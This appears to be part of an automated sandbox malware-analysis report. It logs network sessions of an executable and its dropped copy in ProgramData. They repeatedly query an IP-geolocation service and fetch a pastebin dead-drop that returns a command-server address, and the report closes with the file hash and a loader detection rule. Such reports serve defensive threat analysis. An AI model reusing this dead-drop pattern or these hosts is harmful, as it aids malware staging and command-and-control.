                          2024-06-25 12:55:48 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.4 | 49737 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:49 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:50 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:50 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:50 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.4 | 49738 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:50 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:51 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:51 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:51 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.4 | 49739 | 195.201.57.90 | 443 | 7268 | C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:51 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:52 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:52 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:52 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.4 | 49745 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:57 UTC | 65 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          Connection: Keep-Alive
                          2024-06-25 12:55:57 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:57 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:57 UTC1014INData Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.4 | 49747 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:58 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:58 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:58 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:58 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.4 | 49748 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:55:59 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:55:59 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:55:59 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:55:59 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.4 | 49749 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:00 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:00 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:00 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:00 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          13 | 192.168.2.4 | 49750 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:01 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:01 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:01 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:01 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.4 | 49751 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:02 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:02 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:02 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:02 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.4 | 49752 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:03 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:03 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:03 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:03 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.4 | 49753 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:04 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:04 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:04 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:04 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.4 | 49754 | 195.201.57.90 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:05 UTC | 41 | OUT | GET /xml/ HTTP/1.1
                          Host: ipwhois.app
                          2024-06-25 12:56:05 UTC | 239 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:05 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: ipwhois
                          Access-Control-Allow-Origin: *
                          Access-Control-Allow-Headers: *
                          X-Robots-Tag: noindex
                          2024-06-25 12:56:05 UTC | 1014 | IN | Data Raw: 33 65 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 5f 66 6c 61 67
                          Data Ascii: 3ea<?xml version="1.0" encoding="UTF-8"?><query><ip>8.46.123.33</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><country_flag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.4 | 49755 | 172.67.19.24 | 443 | 7536 | C:\ProgramData\uovan\svrreve.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-06-25 12:56:22 UTC | 74 | OUT | GET /raw/fR7B5m9E HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-06-25 12:56:22 UTC | 388 | IN | HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 12:56:22 GMT
                          Content-Type: text/plain; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          x-frame-options: DENY
                          x-content-type-options: nosniff
                          x-xss-protection: 1;mode=block
                          cache-control: public, max-age=1801
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 25 Jun 2024 12:56:22 GMT
                          Server: cloudflare
                          CF-RAY: 89951e049efc42d5-EWR
                          2024-06-25 12:56:22 UTC | 27 | IN | Data Raw: 31 35 0d 0a 68 74 74 70 3a 2f 2f 31 37 32 2e 38 36 2e 31 30 35 2e 31 30 39 0d 0a
                          Data Ascii: 15http://172.86.105.109
                          2024-06-25 12:56:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Target ID:0
                          Start time:08:55:34
                          Start date:25/06/2024
                          Path:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\ubes6SC7Vd.exe"
                          Imagebase:0x258f28f0000
                          File size:1'972'736 bytes
                          MD5 hash:7DDECCF7C147EA2B90426AEB43277096
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
